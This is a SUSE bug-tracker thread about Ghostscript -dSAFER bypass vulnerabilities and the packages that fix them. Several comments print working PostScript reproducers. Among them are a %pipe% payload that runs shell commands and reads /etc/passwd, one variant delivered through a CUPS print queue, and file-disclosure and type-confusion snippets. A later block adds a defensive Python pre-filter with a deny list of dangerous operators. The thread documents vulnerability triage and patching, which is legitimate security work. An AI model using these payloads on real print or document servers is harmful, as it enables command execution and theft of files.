Bug 1001951 - (CVE-2013-5653) VUL-0: EMU: CVE-2016-7976, CVE-2016-7977, CVE-2016-7978, CVE-2016-7979: ghostscript,ghostscript-library: getenv and filenameforall ignore -dSAFER, possible RCE
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other  OS: Other
Priority: P3 - Medium  Severity: Major
Target Milestone: ---
Assigned To: Security Team bot
https://smash.suse.de/issue/173034/
CVSSv2:RedHat:CVE-2013-5653:4.3:(AV:N...
Depends on:
Blocks:
Reported: 2016-09-29 14:25 UTC by Johannes Segitz
Modified: 2017-07-27 14:41 UTC (History)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug694724_reproducer1.ps (80 bytes, text/plain)
2016-10-07 12:37 UTC, Peter Simons
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug697169_reproducer1.ps (139 bytes, text/plain)
2016-10-07 12:38 UTC, Peter Simons
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug697178_reproducer1.ps (114 bytes, text/plain)
2016-10-07 12:39 UTC, Peter Simons
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps (898 bytes, text/plain)
2016-10-07 12:45 UTC, Peter Simons
SLE-11 patch for CVE-2016-7977 (697169) (894 bytes, patch)
2016-10-08 12:20 UTC, Vítězslav Čížek
Latest gstest.sh to test Ghostscript on SLE12, SLE11, SLE10 (1.90 KB, text/plain)
2016-10-12 14:44 UTC, Johannes Meixner
Description Johannes Segitz 2016-09-29 14:25:37 UTC
rh#1380327 

It was found that getenv and filenameforall ignore -dSAFER possibly allowing filesystem enumeration.

Patch: http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8

Reproducer:
%!PS
(HOME) getenv { print (\n) print } { (variable not found\n) print } ifelse

References:
http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
http://bugs.ghostscript.com/show_bug.cgi?id=697169
http://bugs.ghostscript.com/show_bug.cgi?id=694724
http://seclists.org/oss-sec/2016/q3/651
https://bugzilla.redhat.com/show_bug.cgi?id=1380327
Comment 1 Swamp Workflow Management 2016-09-29 22:00:33 UTC
bugbot adjusting priority
Comment 2 Johannes Meixner 2016-10-05 07:33:40 UTC
It seems currently Google verifies in general
to what extent -dSAFER works in Ghostscript.

Up to now I noticed the following other issues that are
about or related to 'SAFER' at Ghostscript upstream:

http://bugs.ghostscript.com/show_bug.cgi?id=697178

http://bugs.ghostscript.com/show_bug.cgi?id=697179

http://bugs.ghostscript.com/show_bug.cgi?id=697189

http://bugs.ghostscript.com/show_bug.cgi?id=697190

In general look for bug reports from taviso@google.com
at the Ghostscript upstream bugzilla.

Probably more such issues will appear in the near future.

I would like to wait until all the -dSAFER issues
are fixed at upstream Ghostscript and then do a
maintenance update of our RPM packages.
Comment 3 Johannes Meixner 2016-10-05 07:35:54 UTC
security-team,
could you get in contact with taviso@google.com
to establish a direct communication?
Comment 4 Johannes Segitz 2016-10-06 07:54:21 UTC
(In reply to Johannes Meixner from comment #2)
CVEs got assigned 
CVE-2016-7976: http://bugs.ghostscript.com/show_bug.cgi?id=697178
CVE-2016-7977: http://bugs.ghostscript.com/show_bug.cgi?id=697169
CVE-2016-7978: http://bugs.ghostscript.com/show_bug.cgi?id=697179
CVE-2016-7979: http://bugs.ghostscript.com/show_bug.cgi?id=697190

Do you want individual bugs for these or do you want to track them in this bug?

As for Tavis: Any special questions you have for him? He's working with upstream and is posting about it on OSS, which we will transfer here.
Comment 5 Johannes Meixner 2016-10-06 09:23:29 UTC
I would prefer one single bug report (this one) because
I would like to fix all the -dSAFER issues altogether.

I have no special questions for Tavis.
My only intent was that you and he work together.


By the way:
One more Ghostscript upstream -dSAFER related issue:
http://bugs.ghostscript.com/show_bug.cgi?id=697193
Comment 6 Johannes Segitz 2016-10-06 12:35:40 UTC
(In reply to Johannes Meixner from comment #5)
Yes, probably a good idea. Since there's no rush to submit here I would suggest waiting until next week to see what develops. A lot of people are currently looking into this.

More details for the issues mentioned above:
CVE-2016-7976: Various userparams allow %pipe% in paths, allowing remote shell command execution.
       Bug: http://bugs.ghostscript.com/show_bug.cgi?id=697178
Reproducer: http://www.openwall.com/lists/oss-security/2016/09/30/8
     Patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=71ac87493b1e445d6c07554d4246cf7d4f44875c

CVE-2016-7977: .libfile doesn't check PermitFileReading array, allowing remote file disclosure.
       Bug: http://bugs.ghostscript.com/show_bug.cgi?id=697169
Reproducer: http://www.openwall.com/lists/oss-security/2016/09/29/28
     Patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=cf046d2f0fa2c6973c6ca8d582a9b185cc4bd280

CVE-2016-7978: Reference leak in .setdevice allows use-after-free and remote code execution
       Bug: http://bugs.ghostscript.com/show_bug.cgi?id=697179
Reproducer: http://bugs.ghostscript.com/show_bug.cgi?id=697179#c0
     Patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=d5ad1e0298e1c193087c824eb4f79628b182e28b

CVE-2016-7979: Type confusion in .initialize_dsc_parser allows remote code execution
       Bug: http://bugs.ghostscript.com/show_bug.cgi?id=697190
Reproducer: http://bugs.ghostscript.com/show_bug.cgi?id=697190#c0
     Patch: http://git.ghostscript.com/?p=ghostpdl.git;h=875a0095f37626a721c7ff57d606a0f95af03913
Comment 8 Johannes Segitz 2016-10-07 06:28:27 UTC
Will hand this over to EMU as highly visible issue
Comment 9 Simon Lees 2016-10-07 09:57:01 UTC
Johannes Meixner, if you can commit wherever you get to to OBS when you finish for today and link it here, I'll branch your packages and continue working on them Monday morning Australian time. I'll also do any patches that come in over the weekend.

Also, have you used quilt before? If you haven't, it will make working on packages like SLE-11 much easier; if you haven't used it, I'm sure one of us can give you some pointers.
Comment 10 Johannes Meixner 2016-10-07 10:12:49 UTC
Currently I am working with newest Ghostscript 9.20
from the OBS "Printing" project on a Leap 42.1 system.

I got the first ready-to-use reproducer for
http://bugs.ghostscript.com/show_bug.cgi?id=697178

Even with -dSAFER it runs the command "head -n3 /etc/passwd"
and sends its output to the terminal (/dev/tty):
---------------------------------------------------------------------------
# cat gs_bug697178_reproducer1.ps
%!PS
currentdevice
null
true
mark
/OutputICCProfile
(%pipe%head -n3 /etc/passwd > /dev/tty)
.putdeviceparams
quit

# gsparams="-q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage"

# gs $gsparams gs_bug697178_reproducer1.ps
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:486:484:User for Avahi:/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC profile failed
---------------------------------------------------------------------------

In general regarding -dSAFER see
http://www.ghostscript.com/doc/9.20/Language.htm
(excerpt)
---------------------------------------------------------------------------
PermitFileReading <array of strings>
PermitFileWriting <array of strings>
PermitFileControl <array of strings>
...
The SAFER [ http://www.ghostscript.com/doc/9.20/Use.htm#Safer ] mode
and the .setsafe operator set all three lists to empty arrays,
thus the only files that can be read are the %stdin device and
on LIBPATH or FONTPATH or the Resource paths specified by
the /FontResourceDir or /GenericResourceDir system params.
Files cannot be opened for writing anywhere and cannot be deleted
or renamed except for files created with the .tempfile operator). 
---------------------------------------------------------------------------
where
http://www.ghostscript.com/doc/9.20/Use.htm#Safer
reads (excerpt)
---------------------------------------------------------------------------
-dSAFER
    Disables the deletefile and renamefile operators, and the ability
    to open piped commands (%pipe%cmd) ...
---------------------------------------------------------------------------
Comment 11 Johannes Meixner 2016-10-07 10:37:21 UTC
Typo correction for comment #10:
The gs call needs -dSAFER as follows:
---------------------------------------------------------------------------
# gsparams="-q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage"

# gs $gsparams -dSAFER gs_bug697178_reproducer1.ps
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:486:484:User for Avahi:/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC profile failed
---------------------------------------------------------------------------


Furthermore -dPARANOIDSAFER as used by the printing system filters
(the programs in /usr/lib/cups/filter/) does not make a difference:
---------------------------------------------------------------------------
gs $gsparams -dPARANOIDSAFER gs_bug697178_reproducer1.ps
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:486:484:User for Avahi:/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC profile failed
---------------------------------------------------------------------------

This means that when printing a specially crafted PostScript file,
shell command execution as the user 'lp' is possible
(fortunately 'lp' is not allowed to do much - but it can
at least read all other print job data files):
---------------------------------------------------------------------------
%!PS
currentdevice
null
true
mark
/OutputICCProfile
(%pipe%head -n3 /etc/passwd > /tmp/gs_bug697178_printing_reproducer1.out)
.putdeviceparams
currentdevice
null
true
mark
/OutputICCProfile
(%pipe%chmod a+rwx /tmp/gs_bug697178_printing_reproducer1.out)
.putdeviceparams
quit

# lpadmin -p testq -v file:/dev/null \
 -P /usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5e_Printer.ljet4.ppd.gz \
 -E

# lp -d testq gs_bug697178_printing_reproducer1.ps
request id is testq-8415 (1 file(s))

# ls -l /tmp/gs_bug697178_printing_reproducer1.out
-rwxrwxrwx 1 lp lp ... /tmp/gs_bug697178_printing_reproducer1.out

# cat /tmp/gs_bug697178_printing_reproducer1.out
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:486:484:User for Avahi:/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
---------------------------------------------------------------------------
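A defender-side check prompted by the CUPS scenario above, added here as an example (it is not code from the bug report, from Ghostscript or from SUSE): a small Python pre-filter that tokenizes an incoming PostScript job and flags the Ghostscript-specific constructs this report discusses (a %pipe% IODevice inside a string, .putdeviceparams, .libfile, getenv, filenameforall, deletefile, renamefile) so the job can be held before a gs-based filter runs it. The operator table, its one-line notes and the benign sample are this example's own assumptions; the two flagged samples are the reproducers from comment 10 and from the description.

```python
"""Static pre-filter for PostScript print jobs: flag the Ghostscript-specific
constructs discussed in bsc#1001951 before a gs-based CUPS filter runs the job.
Nothing here executes Ghostscript; the document is only tokenized."""
import re

# Operators named in the report; the short notes are this example's wording.
DANGEROUS_OPERATORS = {
    ".putdeviceparams": "device-parameter write, %pipe% vector (CVE-2016-7976)",
    ".libfile": "file open that skipped PermitFileReading (CVE-2016-7977)",
    "getenv": "environment read that -dSAFER does not restrict",
    "filenameforall": "filesystem enumeration that -dSAFER does not restrict",
    "deletefile": "should be disabled under -dSAFER",
    "renamefile": "should be disabled under -dSAFER",
}
PIPE_RE = re.compile(r"%pipe%", re.IGNORECASE)
# '/' is a delimiter, so literal names such as /getenv are flagged as well
# (conservative: a literal name can still be reached via load or exec).
TOKEN_SPLIT_RE = re.compile(r"[\s\[\]{}<>/]+")


def split_code_and_strings(src):
    """Return (code with string literals blanked out, [string bodies]).
    (...) strings nest and use backslash escapes, and a '%' inside a string is
    data; a '%' outside a string starts a comment that runs to end of line."""
    code, strings = [], []
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c == "(":
            depth, j, buf = 1, i + 1, []
            while j < n and depth > 0:
                ch = src[j]
                if ch == "\\" and j + 1 < n:   # keep escape pairs intact
                    buf.append(src[j:j + 2])
                    j += 2
                    continue
                if ch == "(":
                    depth += 1
                elif ch == ")":
                    depth -= 1
                    if depth == 0:
                        j += 1
                        break
                buf.append(ch)
                j += 1
            strings.append("".join(buf))
            code.append(" ")                    # keep token separation
            i = j
        elif c == "%":                          # comment runs to end of line
            nl = src.find("\n", i)
            i = n if nl < 0 else nl
        else:
            code.append(c)
            i += 1
    return "".join(code), strings


def scan_postscript(src):
    """List of (kind, detail) findings; empty means nothing was flagged."""
    code, strings = split_code_and_strings(src)
    findings = [("pipe-iodevice", s) for s in strings if PIPE_RE.search(s)]
    seen = set()
    for tok in TOKEN_SPLIT_RE.split(code):
        if tok in DANGEROUS_OPERATORS and tok not in seen:
            seen.add(tok)
            findings.append(("operator", tok))
    return findings


def verdict(src):
    """'reject' (hold the job for review) on any finding, else 'accept'."""
    return "reject" if scan_postscript(src) else "accept"


# Constructed samples: PIPE_JOB is the comment 10 reproducer (reflowed),
# GETENV_JOB the one from the description, BENIGN_JOB is made up here.
PIPE_JOB = """%!PS
currentdevice null true mark /OutputICCProfile
(%pipe%head -n3 /etc/passwd > /dev/tty) .putdeviceparams quit
"""
GETENV_JOB = r"""%!PS
(HOME) getenv { print (\n) print } { (variable not found\n) print } ifelse
"""
BENIGN_JOB = """%!PS
% a comment mentioning getenv and (%pipe%cmd) must not be flagged
/Helvetica findfont 12 scalefont setfont 72 720 moveto (Hello (nested) world) show showpage
"""
```

A CUPS backend or a mail gateway can call verdict() on the spool file and hold anything that is rejected; a clean verdict is not proof of safety, only the absence of the constructs named on this page.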
Comment 12 Johannes Meixner 2016-10-07 11:10:59 UTC
gs_bug697178_reproducer1.ps does not work
for Ghostscript 9.15 on SLES12:
-----------------------------------------------------------------------------
# cat /etc/issue
Welcome to SUSE Linux Enterprise Server 12 SP2 RC2 (x86_64)

# gsparams="-q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage"

# gs $gsparams -dSAFER gs_bug697178_reproducer1.ps
sfopen: gs_parse_file_name failed.
  ./base/gsicc_manage.c:1084: gsicc_open_search():
 Could not find %pipe%head -n3 /etc/passwd > /dev/tty 
| ./base/gsicc_manage.c:1685: gsicc_set_device_profile():
 cannot find device profile
-----------------------------------------------------------------------------

This could be good news, but it also does not work without -dSAFER:
-----------------------------------------------------------------------------
# gs $gsparams gs_bug697178_reproducer1.ps
sfopen: gs_parse_file_name failed.
  ./base/gsicc_manage.c:1084: gsicc_open_search():
 Could not find %pipe%head -n3 /etc/passwd > /dev/tty 
| ./base/gsicc_manage.c:1685: gsicc_set_device_profile():
 cannot find device profile
-----------------------------------------------------------------------------
which could indicate that it is not -dSAFER that prohibits it
but another reason why it does not work on Ghostscript 9.15.

I am not at all a sufficient PostScript expert to create
PostScript code that actually proves Ghostscript 9.15 is secure.
Comment 13 Johannes Meixner 2016-10-07 11:23:31 UTC
gs_bug697178_reproducer1.ps does not work
for Ghostscript 8.62 on SLES11:
---------------------------------------------------------------------------
# cat /etc/issue
Welcome to SUSE Linux Enterprise Server 11 SP4  (x86_64)

# gsparams="-q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage"

# gs $gsparams -dSAFER gs_bug697178_reproducer1.ps
[no output]

# gs $gsparams gs_bug697178_reproducer1.ps
[no output]
---------------------------------------------------------------------------
Again: That it also does not work without -dSAFER may indicate
that it is not -dSAFER that prohibits it but another reason
why it does not work with Ghostscript 8.62.
Comment 18 Peter Simons 2016-10-07 12:37:21 UTC
Created attachment 696404 [details]
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug694724_reproducer1.ps
Comment 19 Peter Simons 2016-10-07 12:38:30 UTC
Created attachment 696407 [details]
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug697169_reproducer1.ps
Comment 20 Johannes Meixner 2016-10-07 12:39:04 UTC
I would appreciate any help when there are PostScript experts
and - even more important - Ghostscript experts out there
 (as far as I know '.putdeviceparams' is not a generic
  PostScript language command and '%pipe%' is certainly
  something Ghostscript specific)
who could help to create generally working reproducers that
can prove also on older Ghostscript versions whether or not
'-dSAFER' works as it should for each of the various issues.
Comment 21 Peter Simons 2016-10-07 12:39:19 UTC
Created attachment 696408 [details]
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug697178_reproducer1.ps
Comment 22 Peter Simons 2016-10-07 12:45:55 UTC
Created attachment 696413 [details]
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps
Comment 24 Peter Simons 2016-10-07 12:50:51 UTC
SLES10-SP3 is not vulnerable to gs_osssec_2016_q3_651.ps:

 | $ gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps 
 | /etc/passwd
 | stat succeeded
 |  ctime:1322337369 atime:1322337367 size:1117 blocks:8
 |
 | ERROR: /invalidfileaccess in --.libfile--
 | Operand stack:
 |    (/etc/passwd)
 | Execution stack:
 |    %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   1   3   %oparray_pop   1   3   %oparray_pop   1   3   %oparray_pop   1   3   %oparray_pop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   (gx_io_device)   0   (/etc/passwd\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000...)   (file_enum)   --nostringval--   %file_continue   --nostringval--
 | Dictionary stack:
 |    --dict:1135/3371(ro)(G)--   --dict:0/20(G)--   --dict:103/200(L)--
 | Current allocation mode is local
 | Current file position is 898
 | ESP Ghostscript 8.15.3: Unrecoverable error, exit code 1

SLES11-SP1 is vulnerable to gs_osssec_2016_q3_651.ps:

 | $ gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps 
 | /etc/passwd.old
 | stat succeeded
 |  ctime:1433341699 atime:1346205226 size:1353 blocks:8
 | 
 | .libfile returned file
 | 
 | at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
 | bin:x:1
 | /etc/passwd
 | stat succeeded
 |  ctime:1433341699 atime:1433341690 size:1353 blocks:8
 | 
 | .libfile returned file
 | 
 | at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
 | bin:x:1
 | /etc/passwd.YaST2save
 | stat succeeded
 |  ctime:1303828902 atime:1303828902 size:1253 blocks:8
 | 
 | .libfile returned file
 | 
 | root:x:0:0:root:/root:/bin/bash
 | bin:x:1:1:bin:/bin:/bin/bash

SLES12 is not vulnerable to gs_osssec_2016_q3_651.ps:

 | $ gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps 
 | /etc/passwd-
 | stat succeeded
 |  ctime:1421179022 atime:1421179022 size:1462 blocks:8
 | 
 | Error: /invalidfileaccess in --.libfile--
 | Operand stack:
 |    (/etc/passwd-)
 | Execution stack:
 |    %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   1951   1   3   %oparray_pop   1950   1   3   %oparray_pop   1934   1   3   %oparray_pop   1820   1   3   %oparray_pop   --nostringval--   %errorexec_pop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   (gx_io_device)   0   (/etc/passwd-\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000...)   (file_enum)   --nostringval--   %file_continue   --nostringval--
 | Dictionary stack:
 |    --dict:1179/1684(ro)(G)--   --dict:0/20(G)--   --dict:78/200(L)--
 | Current allocation mode is local
 | Current file position is 898
 | GPL Ghostscript 9.15: Unrecoverable error, exit code 1
Comment 26 Johannes Segitz 2016-10-08 07:54:42 UTC
Improved reproducer for CVE-2016-7977 by Florian Weimer
It still tries to open a file in earlier versions, with directory
traversal:

[pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5

The %pipe%-based execution was introduced as a side effect of:

commit 1fae53a708fca6c2ac0417bc23f5d095cc379250
Author: Chris Liddell <chris.liddell@artifex.com>
Date:   Thu Jul 30 17:27:23 2015 +0100

    Bug 696101: fix uses of the sfopen API.

    The stream API in GS is defined as *always* opening files in
    binary mode, where applicable, so there is no need for the API
    clients to specify binary mode.

    This has previously been benign, and thus ignored, but reportedly
    ending up with a duplicate 'b' character in the mode causes a
    crash on Windows 10.

    No cluster differences.


It was not visible before because 'b' in the mode argument to popen
causes glibc's popen to fail.  This is highly non-portable.  Earlier
versions on different libcs are likely to have code execution, too.

=================

Didn't work for me on Leap 42.1 though, which I would have suspected
Comment 27 Vítězslav Čížek 2016-10-08 11:00:09 UTC
CVE-2016-7978 (ghostscript bug 697179) doesn't affect ghostscript 8.x (SLE-11 and below).
The icc_array/icc_struct member which is used after being freed was added during the device profile handling rewrite in the 9.x branch.
(In commit http://git.ghostscript.com/?p=ghostpdl.git;h=b1d311f06250a07d4c360e67369980d199722694)
Comment 30 Vítězslav Čížek 2016-10-08 18:16:23 UTC
(In reply to Johannes Segitz from comment #26)
> The %pipe%-based execution was introduced as a side effect of:
> commit 1fae53a708fca6c2ac0417bc23f5d095cc379250
I can confirm that. SLE-12 patched with 1fae53a708fca6c2ac0417bc23f5d095cc379250 shows the vulnerable behavior, without this commit (current state) it does not.
Comment 39 Johannes Meixner 2016-10-10 08:36:36 UTC
A side note for completeness:

I agree with having the -dSAFER behaviour by default
(and use -dNOSAFER if needed to switch it off - see "man gs")
as requested by Marcus Meissner at upstream
http://bugs.ghostscript.com/show_bug.cgi?id=697202

But it cannot be "simply changed" without causing regressions.
It would break documented default PostScript behaviour because
PostScript is a complete programming language.
Think about having such a SAFER behaviour by default for any
other programming language (e.g. C, Perl, Python, Ruby,...).

FYI, see also what I wrote in the section about
"It is crucial to limit access to CUPS to trusted users" in
https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings
Comment 41 Johannes Segitz 2016-10-11 14:50:57 UTC
EMU team is done here, now we need to check SLE 10 SP3
Comment 44 Swamp Workflow Management 2016-10-11 16:09:26 UTC
SUSE-SU-2016:2492-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1001951
CVE References: CVE-2013-5653,CVE-2016-7978,CVE-2016-7979
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    ghostscript-9.15-11.1
SUSE Linux Enterprise Server for SAP 12 (src):    ghostscript-9.15-11.1
SUSE Linux Enterprise Server 12-SP1 (src):    ghostscript-9.15-11.1
SUSE Linux Enterprise Server 12-LTSS (src):    ghostscript-9.15-11.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    ghostscript-9.15-11.1
Comment 45 Swamp Workflow Management 2016-10-11 16:09:59 UTC
SUSE-SU-2016:2493-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1001951,939342
CVE References: CVE-2013-5653,CVE-2015-3228,CVE-2016-7977,CVE-2016-7979
Sources used:
SUSE OpenStack Cloud 5 (src):    ghostscript-library-8.62-32.38.1
SUSE Manager Proxy 2.1 (src):    ghostscript-library-8.62-32.38.1
SUSE Manager 2.1 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Server 11-SP4 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Server 11-SP3-LTSS (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Server 11-SP2-LTSS (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Debuginfo 11-SP2 (src):    ghostscript-library-8.62-32.38.1
Comment 46 Johannes Segitz 2016-10-12 07:40:26 UTC
And it continues:

CVE-2016-8602: Tavis Ormandy 
    Here is a different type confusion bug, originally I thought it was
    just a NULL dereference, but after seeing the patch it does look
    exploitable.

    id: http://bugs.ghostscript.com/show_bug.cgi?id=697203
    patch: http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=f5c7555c30393e64ec1f5ab0dfae5b55b3b3fc78
    repro: clear 16#41414141 .sethalftone5
Comment 51 Johannes Segitz 2016-10-12 09:58:30 UTC
(In reply to Johannes Segitz from comment #46)
I'll open a new bug for CVE-2016-8602, handling this all in one bug becomes unwieldy
Comment 54 Johannes Meixner 2016-10-12 14:44:04 UTC
Created attachment 696992 [details]
Latest gstest.sh to test Ghostscript on SLE12, SLE11, SLE10
Comment 60 Johannes Meixner 2016-10-13 15:11:53 UTC
As far as I understand it the issue is now fixed
for all maintained SLE products.

Now the fixes for openSUSE...
Comment 62 Simon Lees 2016-10-14 01:10:10 UTC
(In reply to Johannes Meixner from comment #60)
> As far as I understand it the issue is now fixed
> for all maintained SLE products.
> 
> Now the fixes for openSUSE...

Leap should be already done as in this case it takes fixes from SLE-12, so it's just 13.2 and Tumbleweed
Comment 63 Johannes Meixner 2016-10-17 12:39:07 UTC
Submitted to "Printing" => openSUSE:Factory => Tumbleweed:
----------------------------------------------------------------------------
$ osc request accept -m 'Ghostscript security update that fixes
 (CVE-2013-5653 is already fixed in the 9.20 sources)
 CVE-2016-7976 CVE-2016-7977 CVE-2016-7978 CVE-2016-7979 (all bsc#1001951)
 and CVE-2016-8602 (bsc#1004237)' 435738                                                    
Result of change request state: ok
openSUSE:Factory 
Forward this submit to it? ([y]/n)y
There are already the following submit request: 346383, 429441.
Supersede the old requests? (y/n/c) y
Ghostscript security update that fixes
 (CVE-2013-5653 is already fixed in the 9.20 sources)
 CVE-2016-7976 CVE-2016-7977 CVE-2016-7978 CVE-2016-7979 (all bsc#1001951)
 and CVE-2016-8602 (bsc#1004237) (forwarded request 435738 from jsmeix)
New request # 435739
----------------------------------------------------------------------------
Comment 64 Bernhard Wiedemann 2016-10-17 14:00:18 UTC
This is an autogenerated message for OBS integration:
This bug (1001951) was mentioned in
https://build.opensuse.org/request/show/435739 Factory / ghostscript
Comment 65 Johannes Meixner 2016-10-19 12:49:15 UTC
Fixed for openSUSE 13.2:
-----------------------------------------------------------------------------
$ osc branch -M openSUSE:13.2 ghostscript

...


$ osc mr -m 'Ghostscript security update that fixes
 CVE-2013-5653 CVE-2016-7978 CVE-2016-7979 (all bsc#1001951)
 and CVE-2016-8602 (bsc#1004237)'
 home:jsmeix:branches:openSUSE:13.2:Update ghostscript.openSUSE_13.2_Update
 openSUSE:13.2:Update            
Using target project 'openSUSE:Maintenance'
436173
-----------------------------------------------------------------------------

Note:
Ghostscript 9.15 on openSUSE 13.2 seems not to be
affected by CVE-2016-7976 and CVE-2016-7977
because their reproducers do not succeed there.

According to comment #62 the issue is now fixed
for all maintained SLE and openSUSE products.
Comment 66 Bernhard Wiedemann 2016-10-19 14:01:45 UTC
This is an autogenerated message for OBS integration:
This bug (1001951) was mentioned in
https://build.opensuse.org/request/show/436173 13.2 / ghostscript
Comment 68 Swamp Workflow Management 2016-10-20 15:09:33 UTC
openSUSE-SU-2016:2574-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1001951
CVE References: CVE-2013-5653,CVE-2016-7978,CVE-2016-7979
Sources used:
openSUSE Leap 42.1 (src):    ghostscript-9.15-8.1, ghostscript-mini-9.15-8.1
Comment 70 Swamp Workflow Management 2016-10-26 12:53:55 UTC
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2016-11-09.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/63157
Comment 71 Swamp Workflow Management 2016-10-26 16:06:53 UTC
openSUSE-SU-2016:2648-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1001951,1004237
CVE References: CVE-2013-5653,CVE-2016-7978,CVE-2016-7979,CVE-2016-8602
Sources used:
openSUSE 13.2 (src):    ghostscript-9.15-6.1, ghostscript-mini-9.15-6.1
Comment 73 Marcus Meissner 2017-05-15 15:00:27 UTC
released